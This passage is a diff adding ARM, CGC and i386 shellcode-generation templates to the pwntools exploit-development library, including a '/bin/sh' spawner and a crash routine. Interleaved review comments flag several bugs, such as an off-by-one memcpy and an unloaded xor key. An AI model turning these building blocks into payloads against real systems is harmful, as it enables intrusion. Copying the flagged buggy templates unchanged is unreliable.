@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/arm/linux/waitpid.asm b/pwnlib/shellcraft/templates/arm/linux/waitpid.asm new file mode 100644 index 000000000..b30ef692d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/arm/linux/write.asm b/pwnlib/shellcraft/templates/arm/linux/write.asm new file mode 100644 index 000000000..ea20a35a3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/arm/linux/writev.asm b/pwnlib/shellcraft/templates/arm/linux/writev.asm new file mode 100644 index 000000000..4a81d9e1c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/writev.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/arm/memcpy.asm b/pwnlib/shellcraft/templates/arm/memcpy.asm new file mode 100644 index 000000000..8c4b2d877 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/memcpy.asm @@ -0,0 +1,19 @@ +<% from pwnlib.shellcraft import arm, pretty, common %> +<%docstring>Copies memory. + +Args: + dest: Destination address + src: Source address + n: Number of bytes + +<%page args="dest, src, n"/> +<% +memcpy_loop = common.label("memcpy_loop") +%> + /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ + ${arm.setregs({'r0': dest, 'r1': src, 'r2': n})} +${memcpy_loop}: + ldrb r3, [r1], #1 + strb r3, [r0], #1 + subs r2, r2, #1 + bge ${memcpy_loop} diff --git a/pwnlib/shellcraft/templates/arm/mov.asm b/pwnlib/shellcraft/templates/arm/mov.asm index 765b5bcf7..ee812988b 100644 --- a/pwnlib/shellcraft/templates/arm/mov.asm +++ b/pwnlib/shellcraft/templates/arm/mov.asm @@ -1,10 +1,9 @@ <% - from pwnlib.shellcraft import common - from pwnlib import constants - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.shellcraft import common, eval, pretty, okay + from pwnlib.constants import Constant from pwnlib.log import getLogger from pwnlib.shellcraft.registers import arm as regs - from pwnlib.util.fiddling import negate, bnot + from pwnlib.util import fiddling log = getLogger('pwnlib.shellcraft.arm.mov') %> <%page args="dst, src"/> 
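Review bot: The loop in memcpy.asm copies `n + 1` bytes: `subs r2, r2, #1` followed by `bge` branches back when r2 has just reached 0, so one extra byte is read from `src` and written past `dest`, and an `n` of 0 still copies a byte. A count-first loop with conditional load/store copies exactly `n` bytes and handles `n == 0`; the rewritten loop is below, the `setregs` line and label allocation above it are unchanged.
```mako
${memcpy_loop}:
    subs r2, r2, #1          /* borrow (lo) once the count is exhausted */
    ldrbhs r3, [r1], #1
    strbhs r3, [r0], #1
    bhs ${memcpy_loop}
```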
@@ -21,40 +20,90 @@ on the value of `context.os`. Examples: >>> print shellcraft.arm.mov('r0','r1').rstrip() - mov r0, r1 + mov r0, r1 >>> print shellcraft.arm.mov('r0', 5).rstrip() - /* Set r0 = 5 = 0x5 */ - mov r0, #5 + mov r0, #5 >>> print shellcraft.arm.mov('r0', 0x34532).rstrip() - /* Set r0 = 214322 = 0x34532 */ - movw r0, #17714 - movt r0, #3 + movw r0, #0x34532 & 0xffff + movt r0, #0x34532 >> 16 + >>> print shellcraft.arm.mov('r0', 0x101).rstrip() + movw r0, #0x101 + >>> print shellcraft.arm.mov('r0', 0xff << 14).rstrip() + mov r0, #0x3fc000 + >>> print shellcraft.arm.mov('r0', 0xff << 15).rstrip() + movw r0, #0x7f8000 & 0xffff + movt r0, #0x7f8000 >> 16 + >>> print shellcraft.arm.mov('r0', 0xf00d0000).rstrip() + eor r0, r0 + movt r0, #0xf00d0000 >> 16 + >>> print shellcraft.arm.mov('r0', 0xffff00ff).rstrip() + mvn r0, #(0xffff00ff ^ (-1)) + >>> print shellcraft.arm.mov('r0', 0x1fffffff).rstrip() + mvn r0, #(0x1fffffff ^ (-1)) Args: - dest (str): The destination register. + dest (str): ke destination register. src (str): Either the input register, or an immediate value. 
<% if not dst in regs: log.error('%r is not a register' % str(dst)) + +# ARM has a mov-const-with-shift +# As long as the const fits in 8 bits, everything works out :) +def get_imm8_shift_ok(v): + v_bits = fiddling.bits(v) + retval = 0 + + if v == 0: + return 1 + + trailing_zeroes = v_bits[::-1].index(1) + leading_zeroes = v_bits.index(1) + width = len(v_bits) - leading_zeroes - trailing_zeroes + + if width > 8: + return 0 + + retval = v >> trailing_zeroes + + if width > 8 \ + or not okay(retval, bits=8) \ + or (width == 8 and 0 != (trailing_zeroes % 2)): + return 0 + + return retval + if not src in regs: - with ctx.local(arch = 'arm'): - src = constants.eval(src) + src = eval(src) + srcu = src & 0xffffffff + srcn = fiddling.negate(src + 1) + positive_imm8_shift = get_imm8_shift_ok(srcu) + negative_imm8_shift = get_imm8_shift_ok(srcn) %> -%if not isinstance(src, (int, long)): - mov ${dst}, ${src} +%if src == dst: + /* mov ${dst}, ${src} */ +%elif not isinstance(src, (int, long)): + mov ${dst}, ${src} %else: - /* Set ${dst} = ${src} = 0x${'%x' % src} */ - %if src == 0: - eor ${dst}, ${dst} - %elif src & 0xffff0000 == 0: - mov ${dst}, #${src} - %elif src & 0xffffff00 == 0xffffff00: - mvn ${dst}, #${bnot(src) & 0xff} - %else: - movw ${dst}, #${src & 0xffff} - movt ${dst}, #${src >> 16} - %endif + %if src == 0: + eor ${dst}, ${dst} /* ${src} (${'#%x' % src}) */ + %elif positive_imm8_shift: + mov ${dst}, #${pretty(src)} + %elif src & 0x0000ffff == src: + movw ${dst}, #${pretty(src)} + %elif negative_imm8_shift: + mvn ${dst}, #(${pretty(src)} ^ (-1)) + %elif src > 0 and srcu & 0xffff0000 == src: + eor ${dst}, ${dst} + movt ${dst}, #${pretty(src)} >> 16 + %elif src > 0: + movw ${dst}, #${pretty(src)} & 0xffff + movt ${dst}, #${pretty(src)} >> 16 + %else: + movw ${dst}, #${pretty(src)} >> 00 & 0xffff + movt ${dst}, #${pretty(src)} >> 16 & 0xffff + %endif %endif 
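Review bot: The docstring on the new side now reads `dest (str): ke destination register.` — the `T` of `The` was lost; restore `dest (str): The destination register.` (the `<%page>` parameter is actually `dst`, so `dst (str):` would match). In `get_imm8_shift_ok`, `width > 8` is tested twice — the early `return 0` makes the repeated test in the combined condition dead — and the final `%else` branch emits `>> 00 & 0xffff`, where `>> 00` is a no-op that reads like a typo; `& 0xffff` alone is clearer. This hunk begins mid-docstring on the previous line, and the `<%page>` header is outside it.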
diff --git a/pwnlib/shellcraft/templates/arm/push.asm b/pwnlib/shellcraft/templates/arm/push.asm index 49e652e67..873af29d3 100644 --- a/pwnlib/shellcraft/templates/arm/push.asm +++ b/pwnlib/shellcraft/templates/arm/push.asm @@ -1,16 +1,23 @@ <% from pwnlib import constants %> <% from pwnlib.util import lists, packing, fiddling %> <% from pwnlib.shellcraft.arm import mov %> -<%page args="word"/> +<%page args="word, register='r12'"/> <%docstring> -Pushes a 32-bit integer onto the stack. Uses R7 as a temporary register. +Pushes a 32-bit integer onto the stack. Uses r12 as a temporary register. + +r12 is defined as the inter-procedural scartch register ($ip), +so this should not interfere with most usage. Args: - word (int, str): The word to push + word (int, str): + The word to push + tmpreg (str): + Register to use as a temporary register. R7 is used by default. + -% if isinstance(word, int) and word < 0xffff: +% if isinstance(word, int) and 0 < word < 0xffff: push ${hex(word)} % else: - ${mov('r7',word)} - push {r7} + ${mov(register,word)} + push {${register}} % endif diff --git a/pwnlib/shellcraft/templates/arm/pushstr.asm b/pwnlib/shellcraft/templates/arm/pushstr.asm index d7cf94a6b..fb9b995d7 100644 --- a/pwnlib/shellcraft/templates/arm/pushstr.asm +++ b/pwnlib/shellcraft/templates/arm/pushstr.asm 
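Review bot: The docstring in push.asm documents a parameter `tmpreg` for which "R7 is used by default", but the `<%page>` line declares it as `register='r12'`; rename the entry to `register (str): Register to use as a temporary register. r12 is used by default.` and fix `scartch` → `scratch`. The immediate path also changed from `word < 0xffff` to `0 < word < 0xffff`, so a zero word now goes through `mov` (which emits `eor`) instead of `push 0`; if that is deliberate, a one-line comment above the `% if` stating why would save the next reader from guessing.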
@@ -1,12 +1,25 @@ <% from pwnlib.util import lists, packing, fiddling %> <% from pwnlib.shellcraft.arm import push %> -<%page args="string, append_null = True"/> +<%page args="string, append_null = True, register='r7'"/> <%docstring> Pushes a string onto the stack. Args: - string (str): The string to push. - append_null (bool): Whether to append a single NULL-byte before pushing. + string (str): The string to push. + append_null (bool): Whether to append a single NULL-byte before pushing. + register (str): Temporary register to use. By default, R7 is used. + +Examples: + + >>> print shellcraft.arm.pushstr("Hello!").rstrip() + /* push 'Hello!\x00A' */ + movw r7, #0x4100216f & 0xffff + movt r7, #0x4100216f >> 16 + push {r7} + movw r7, #0x6c6c6548 & 0xffff + movt r7, #0x6c6c6548 >> 16 + push {r7} + <% if append_null: @@ -17,5 +30,5 @@ Args: %>\ /* push ${repr(string)} */ % for word in packing.unpack_many(string, 32)[::-1]: - ${push(word)} + ${push(word, register)} % endfor diff --git a/pwnlib/shellcraft/templates/arm/setregs.asm b/pwnlib/shellcraft/templates/arm/setregs.asm new file mode 100644 index 000000000..c6f3ed9d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/setregs.asm 
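Review bot: pushstr.asm defaults its new `register` parameter to `'r7'`, while push.asm in the same commit moves its scratch register from r7 to r12 because r12 is the inter-procedural scratch register; on ARM Linux r7 also carries the syscall number, so a `pushstr` placed between register setup and `svc` overwrites it. Unless a caller depends on r7, default to `register='r12'` here too and update `register (str): Temporary register to use. By default, r12 is used.` and the doctest to match. The `% for word in ...` loop in the second hunk only passes `register` through and needs no other change.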
@@ -0,0 +1,43 @@ +<% + from pwnlib.regsort import regsort + from pwnlib.constants import Constant, eval + from pwnlib.shellcraft import registers + from pwnlib.shellcraft.arm import mov +%> +<%page args="reg_context, stack_allowed = True"/> +<%docstring> +Sets multiple registers, taking any register dependencies into account +(i.e., given eax=1,ebx=eax, set ebx first). + +Args: + reg_context (dict): Desired register context + stack_allowed (bool): Can the stack be used? + +Example: + + >>> print shellcraft.setregs({'r0':1, 'r2':'r3'}).rstrip() + mov r0, #1 + mov r2, r3 + >>> print shellcraft.setregs({'r0':'r1', 'r1':'r0', 'r2':'r3'}).rstrip() + mov r2, r3 + eor r0, r0, r1 /* xchg r0, r1 */ + eor r1, r0, r1 + eor r0, r0, r1 + +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} +sorted_regs = regsort(reg_context, registers.arm) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, dst, src in regsort(reg_context, registers.arm): +% if how == 'xchg': + eor ${dst}, ${dst}, ${src} /* xchg ${dst}, ${src} */ + eor ${src}, ${dst}, ${src} + eor ${dst}, ${dst}, ${src} +% else: + ${mov(dst, src)} +% endif +% endfor +% endif diff --git a/pwnlib/shellcraft/templates/arm/to_thumb.asm b/pwnlib/shellcraft/templates/arm/to_thumb.asm index a4654cef3..f89179ce4 100644 --- a/pwnlib/shellcraft/templates/arm/to_thumb.asm +++ b/pwnlib/shellcraft/templates/arm/to_thumb.asm @@ -1,5 +1,21 @@ +<% + from random import choice + from pwnlib.shellcraft import registers +%> <%docstring>Go from ARM to THUMB mode. +<%page args="reg=None, avoid = []"/> +<% + if reg: + pass + elif not avoid or 'r3' not in avoid: + reg = 'r3' + else: + # Avoid registers we don't want to clobber, and r0 + # since it will encode a NULL. + avoid = set(avoid) | {'r0', 'sp', 'pc', 'cpsr', 'lr'} + reg = next(r for r in registers.arm if r not in avoid) +%> .arm - add r3, pc, #1 - bx r3 + add ${reg}, pc, #1 + bx ${reg} .thumb 
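Review bot: setregs.asm computes `sorted_regs = regsort(reg_context, registers.arm)` and then calls `regsort(...)` a second time in the `% for` header instead of using the stored result; change it to `% for how, dst, src in sorted_regs:`. The `stack_allowed` argument is declared and documented but never read, and the docstring's dependency example (`eax=1,ebx=eax`) is x86 in an ARM template — `r0=1,r1=r0` would match the doctests that follow it.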
diff --git a/pwnlib/shellcraft/templates/arm/trap.asm b/pwnlib/shellcraft/templates/arm/trap.asm index d9c40dcf5..6783b0c21 100644 --- a/pwnlib/shellcraft/templates/arm/trap.asm +++ b/pwnlib/shellcraft/templates/arm/trap.asm @@ -1,2 +1,8 @@ <%docstring>A trap instruction. - BKPT + nop + nop + nop + mov r0, 12 + mov r1, sp + BKPT 0xab + B . diff --git a/pwnlib/shellcraft/templates/arm/udiv_10.asm b/pwnlib/shellcraft/templates/arm/udiv_10.asm new file mode 100644 index 000000000..9125c9da5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/udiv_10.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft import arm +%> +<%page args="N"/> +<%docstring> +Divides r0 by 10. Result is stored in r0, N and Z flags are updated. + +Code is from generated from here: + https://raw.githubusercontent.com/rofirrim/raspberry-pi-assembler/master/chapter15/magic.py + +With code: + python magic.py 10 code_for_unsigned + + /* r0 = ${N} / 10 */ + ${arm.setregs({'r0': N, 'r1': 0xcccccccd})} + umull r1, r2, r1, r0 /* r1 <- Lower32Bits(r1*r0). r2 <- Upper32Bits(r1*r0) */ + movs r0, r2, LSR #3 /* r0 <- r2 >> 3 */ diff --git a/pwnlib/shellcraft/templates/arm/xor.asm b/pwnlib/shellcraft/templates/arm/xor.asm new file mode 100644 index 000000000..8e5e84ad6 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/xor.asm 
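Review bot: trap.asm's docstring still says only `A trap instruction.`, but the new body clobbers r0 and r1, executes `BKPT 0xab` and then spins forever on `B .`. The register setup before the breakpoint looks like a semihosting-style argument block, but nothing on the page says so; a docstring such as `Trap to the debugger. Clobbers r0 and r1; if nothing intercepts the BKPT, execution loops forever.` plus a one-line comment on `mov r0, 12` naming what the value means would make the intent checkable.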
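Review bot: udiv_10.asm's docstring says `Divides r0 by 10`, but the template takes `N`, loads it into r0 through `arm.setregs`, and uses r1 and r2 as scratch, none of which is documented; `Computes N / 10 into r0 (N may be an immediate or a register). Clobbers r1 and r2; N and Z flags reflect the result.` states the actual contract, and `Code is from generated from here` has a stray word. `umull r1, r2, r1, r0` uses r1 as both RdLo and Rm; on pre-ARMv6 cores that combination is documented as unpredictable, so if older cores are a target the scratch registers should be distinct, e.g. `umull r2, r3, r1, r0` followed by `movs r0, r3, LSR #3`.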
@@ -0,0 +1,67 @@ +<% + from pwnlib.shellcraft import pretty, common, arm, registers + from pwnlib.shellcraft.registers import arm as regs + from pwnlib.util.packing import pack, unpack + from pwnlib.context import context as ctx + from pwnlib.log import getLogger +%> +<%page args="key, address, count"/> +<%docstring> +XORs data a constant value. + +Args: + key (int,str): XOR key either as a 4-byte integer, + If a string, length must be a power of two, + and not longer than 4 bytes. + address (int): Address of the data (e.g. 0xdead0000, 'rsp') + count (int): Number of bytes to XOR. + +<% +log = getLogger('pwnlib.shellcraft.templates.arm.xor') + +# By default, assume the key is a register +key_size = ctx.bytes +key_pretty = key + +if not key in regs: + key_str = key + key_int = key + + if isinstance(key, int): + key_str = pack(key, bytes=4) + else: + key_int = unpack(key, 'all') + + if len(key_str) > ctx.bytes: + log.error("Key %s is too large (max %i bytes)" % (pretty(key), ctx.bytes)) + + if len(key_str) not in (1,2,4): + log.error("Key length must be a power of two (got %s)" % pretty(key)) + + key_size = len(key_str) + key_pretty = pretty(key_int) + +if count == 0 or key_size == 0: + return '/* noop xor */' + +start = common.label('start') + +## Determine the move size +word_name = {1:'BYTE', 2:'WORD', 4:'DWORD', 8:'QWORD'}[key_size] + +## Set up the register context +regctx = {'r0': count, 'r1': address} +if key in regs: + regctx['r2'] = key + key_pretty = 'r2' +%> + /* xor(${pretty(key)}, ${pretty(address)}, ${pretty(count)}) */ + ${arm.setregs(regctx)} + add r0, r0, r1 +${start}: + ldr r3, [r1] + eor r3, r3, r2 + str r3, [r1] + add r1, r1, ${key_size} + cmp r1, r0 + blt ${start} diff --git a/pwnlib/shellcraft/templates/i386/cgc/__doc__ b/pwnlib/shellcraft/templates/i386/cgc/__doc__ new file mode 100644 index 000000000..e69de29bb 
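Review bot: For an immediate key, xor.asm never loads the key into r2: `regctx['r2'] = key` runs only when `key in regs`, yet the loop always executes `eor r3, r3, r2`, so a call with an integer or string key XORs with whatever r2 happened to hold. Add `else: regctx['r2'] = key_int` after the `if key in regs:` block; `key_pretty` is then unused and can go. Separately, `ldr`/`str` always move 32 bits while the pointer advances by `key_size`, so 1- and 2-byte keys rewrite overlapping words (and `word_name` is computed but never used), and `cmp r1, r0` / `blt` is a signed comparison of two addresses where `blo` is the unsigned form.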
diff --git a/pwnlib/shellcraft/templates/i386/cgc/allocate.asm b/pwnlib/shellcraft/templates/i386/cgc/allocate.asm new file mode 100644 index 000000000..a5327c81f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/allocate.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="length, is_X, addr"/> +<%docstring> +Invokes the syscall allocate. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/allocate.md + +Arguments: + length(int): length + is_X(int): is_X + addr(int): addr + + + ${syscall('SYS_allocate', length, is_X, addr)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/cat.asm b/pwnlib/shellcraft/templates/i386/cgc/cat.asm new file mode 100644 index 000000000..a5327c81f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/cat.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="length, is_X, addr"/> +<%docstring> +Invokes the syscall allocate. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/allocate.md + +Arguments: + length(int): length + is_X(int): is_X + addr(int): addr + + + ${syscall('SYS_allocate', length, is_X, addr)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/deallocate.asm b/pwnlib/shellcraft/templates/i386/cgc/deallocate.asm new file mode 100644 index 000000000..6eaabd209 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/deallocate.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="addr, length"/> +<%docstring> +Invokes the syscall deallocate. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/deallocate.md + +Arguments: + addr(int): addr + length(int): length + + + ${syscall('SYS_deallocate', addr, length)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/fdwait.asm b/pwnlib/shellcraft/templates/i386/cgc/fdwait.asm new file mode 100644 index 000000000..5d5bc9cd1 --- /dev/null 
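Review bot: cat.asm is a byte-for-byte copy of allocate.asm (both `index` lines carry blob id `a5327c81f`): its docstring says `Invokes the syscall allocate` and it emits `syscall('SYS_allocate', length, is_X, addr)`, so `shellcraft.i386.cgc.cat` would allocate memory rather than copy data. Either drop the file or replace it with the intended receive/transmit loop; sendfile.asm later in this commit looks like that implementation.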
+++ b/pwnlib/shellcraft/templates/i386/cgc/fdwait.asm @@ -0,0 +1,19 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="nfds, readfds, writefds, timeout, readyfds"/> +<%docstring> +Invokes the syscall fdwait. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/fdwait.md + +Arguments: + nfds(int): nfds + readfds(int): readfds + writefds(int): writefds + timeout(int): timeout + readyfds(int): readyfds + + + ${syscall('SYS_fdwait', nfds, readfds, writefds, timeout, readyfds)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/random.asm b/pwnlib/shellcraft/templates/i386/cgc/random.asm new file mode 100644 index 000000000..fe2842137 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/random.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="buf, count, rnd_bytes"/> +<%docstring> +Invokes the syscall random. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/random.md + +Arguments: + buf(int): buf + count(int): count + rnd_bytes(int): rnd_bytes + + + ${syscall('SYS_random', buf, count, rnd_bytes)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/receive.asm b/pwnlib/shellcraft/templates/i386/cgc/receive.asm new file mode 100644 index 000000000..84d45d915 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/receive.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="fd, buf, count, bytes"/> +<%docstring> +Invokes the syscall receive. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/receive.md + +Arguments: + fd(int): fd + buf(int): buf + count(int): count + bytes(int): bytes + + + ${syscall('SYS_receive', fd, buf, count, bytes)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/sendfile.asm b/pwnlib/shellcraft/templates/i386/cgc/sendfile.asm new file mode 100644 index 000000000..37667ad1d --- /dev/null 
+++ b/pwnlib/shellcraft/templates/i386/cgc/sendfile.asm @@ -0,0 +1,29 @@ +<% + from pwnlib.shellcraft import okay + from pwnlib.shellcraft.i386 import cgc, mov +%> +<%page args="src, dst, n=0x80"/> +<%docstring> +Forwards data from one file descriptor to another. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/allocate.md + +Arguments: + src(int): Source file descriptor + dst(int): Destination file descriptor + + + push ebp + mov ebp, esp +% if n <= 0x80: + add esp, -${n} + ${cgc.receive(src, 'esp', n, 0)} +%else: + ${mov('eax', n)} + sub esp, eax + ${cgc.transmit(src, 'esp', 'eax', 0)} +%endif + ${cgc.transmit(dst, 'esp', n, 0)} + mov esp, ebp + pop ebp diff --git a/pwnlib/shellcraft/templates/i386/cgc/syscall.asm b/pwnlib/shellcraft/templates/i386/cgc/syscall.asm new file mode 100644 index 000000000..b02b71105 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/syscall.asm 
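Review bot: In sendfile.asm the `%else` branch for `n > 0x80` calls `cgc.transmit(src, 'esp', 'eax', 0)` where the small-buffer branch calls `cgc.receive(src, 'esp', n, 0)`; reading from `src` needs `receive` on both paths, so it should be `${cgc.receive(src, 'esp', 'eax', 0)}`. The docstring links to `allocate.md` and omits the `n` parameter; `n(int): Number of bytes to forward (default 0x80)` together with the receive/transmit references would fit. The closing `cgc.transmit(dst, 'esp', n, 0)` also sends `n` bytes regardless of how many `receive` returned, since the rx_bytes pointer is passed as 0 — worth a comment if a short read is acceptable here.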
@@ -0,0 +1,42 @@ +<% + from pwnlib.shellcraft import i386 + from pwnlib.constants import Constant + from pwnlib.abi import linux_i386_syscall as abi +%> +<%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None"/> +<%docstring> +Args: [syscall_number, \*args] + Does a syscall + +Any of the arguments can be expressions to be evaluated by :func:`pwnlib.constants.eval`. + +<% + append_cdq = False + if isinstance(syscall, (str, unicode, Constant)) and str(syscall).startswith('SYS_'): + syscall_repr = str(syscall)[4:] + "(%s)" + args = [] + else: + syscall_repr = 'syscall(%s)' + if syscall == None: + args = ['?'] + else: + args = [repr(syscall)] + + for arg in [arg0, arg1, arg2, arg3, arg4, arg5]: + if arg == None: + args.append('?') + else: + args.append(repr(arg)) + while args and args[-1] == '?': + args.pop() + syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) +%>\ + /* call ${syscall_repr} */ +%if any(a is not None for a in arguments): + ${i386.setregs(regctx)} +%endif + int 0x80 diff --git a/pwnlib/shellcraft/templates/i386/cgc/terminate.asm b/pwnlib/shellcraft/templates/i386/cgc/terminate.asm new file mode 100644 index 000000000..a5da87983 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/terminate.asm @@ -0,0 +1,15 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall terminate. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/_terminate.md + +Arguments: + status(int): status + + + ${syscall('SYS_terminate', status)} diff --git a/pwnlib/shellcraft/templates/i386/cgc/transmit.asm b/pwnlib/shellcraft/templates/i386/cgc/transmit.asm new file mode 100644 index 000000000..453609789 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/cgc/transmit.asm 
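Review bot: `if syscall == None:` and `if arg == None:` in cgc/syscall.asm compare against `None` with `==`; `is None` is the idiomatic identity test and does not depend on how `Constant` implements equality. The `%if any(a is not None for a in arguments):` guard here is the correct form and is what the arm/linux/syscall.asm hunk earlier in this commit should also use.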
@@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft.i386.cgc import syscall +%> +<%page args="fd, buf, count, tx_bytes"/> +<%docstring> +Invokes the syscall transmit. + +For more information, see: +https://github.com/CyberGrandChallenge/libcgc/blob/master/transmit.md + +Arguments: + fd(int): fd + buf(int): buf + count(int): count + tx_bytes(int): tx_bytes + + + ${syscall('SYS_transmit', fd, buf, count, tx_bytes)} diff --git a/pwnlib/shellcraft/templates/i386/crash.asm b/pwnlib/shellcraft/templates/i386/crash.asm new file mode 100644 index 000000000..4ee8dba6a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/crash.asm @@ -0,0 +1,11 @@ +<%docstring> +Crash. + +Example: + + >>> run_assembly(shellcraft.crash()).poll(True) + -11 + + popad /* fill all registers with shit */ + xor esp, esp /* especially esp */ + jmp esp /* boom */ diff --git a/pwnlib/shellcraft/templates/i386/epilog.asm b/pwnlib/shellcraft/templates/i386/epilog.asm new file mode 100644 index 000000000..6cbc8e11f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/epilog.asm @@ -0,0 +1,14 @@ +<%page args="nargs=0"/> +<%docstring> +Function epilogue. + +Arguments: + nargs(int): Number of arguments to pop off the stack. + + + leave +%if nargs: + ret ${nargs}*4 +%else: + ret +%endif diff --git a/pwnlib/shellcraft/templates/i386/freebsd/push.asm b/pwnlib/shellcraft/templates/i386/freebsd/push.asm index e65a1d0ec..da415d449 100644 --- a/pwnlib/shellcraft/templates/i386/freebsd/push.asm +++ b/pwnlib/shellcraft/templates/i386/freebsd/push.asm @@ -11,7 +11,7 @@ Thin wrapper around :func:`pwnlib.shellcraft.i386.push`, which sets Example: >>> print pwnlib.shellcraft.i386.freebsd.push('SYS_execve').rstrip() - /* push (SYS_execve) == 0x3b */ + /* push (SYS_execve) (0x3b) */ push 0x3b diff --git a/pwnlib/shellcraft/templates/i386/freebsd/sh.asm b/pwnlib/shellcraft/templates/i386/freebsd/sh.asm index f75d1e25b..f1b7cd824 100644 --- a/pwnlib/shellcraft/templates/i386/freebsd/sh.asm 
+++ b/pwnlib/shellcraft/templates/i386/freebsd/sh.asm @@ -1,5 +1,7 @@ <% from pwnlib.shellcraft import i386 %> -<%docstring>Execute /bin/sh +<%docstring> +Execute /bin/sh + /* Clear eax, ecx, edx */ diff --git a/pwnlib/shellcraft/templates/i386/function.asm b/pwnlib/shellcraft/templates/i386/function.asm new file mode 100644 index 000000000..ca8eb0e06 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/function.asm @@ -0,0 +1,65 @@ +<% + from pwnlib.shellcraft import i386 +%> +<%docstring> +Converts a shellcraft template into a callable function. + +Arguments: + template_sz(callable): + Rendered shellcode template. Any variable Arguments + should be supplied as registers. + name(str): + Name of the function. + registers(list): + List of registers which should be filled from the stack. + +:: + + >>> shellcode = '' + >>> shellcode += shellcraft.function('write', shellcraft.i386.linux.write, ) + + >>> hello = shellcraft.i386.linux.echo("Hello!", 'eax') + >>> hello_fn = shellcraft.i386.function(hello, 'eax').strip() + >>> exit = shellcraft.i386.linux.exit('edi') + >>> exit_fn = shellcraft.i386.function(exit, 'edi').strip() + >>> shellcode = ''' + ... push STDOUT_FILENO + ... call hello + ... push 33 + ... call exit + ... hello: + ... %(hello_fn)s + ... exit: + ... %(exit_fn)s + ... ''' % (locals()) + >>> p = run_assembly(shellcode) + >>> p.recvall() + 'Hello!' + >>> p.wait_for_close() + >>> p.poll() + 33 + +Notes: + + Can only be used on a shellcraft template which takes + all of its arguments as registers. For example, the + pushstr + +<%page args="name, template_function, *registers"/> +<% + ifdef = '_%s_' % name +%> +/* ${name}(${', '.join(registers)}) */ +#ifndef ${ifdef} +#define ${ifdef} +${name}: + /* Save stack */ + ${i386.prolog()} + /* Load arguments */ +% for i, reg in enumerate(registers): + ${i386.stackarg(i, reg)} +% endfor + ${template_function(*registers)} + /* Restore stack */ + ${i386.epilog(len(registers))} +#endif /* ${ifdef} */ 
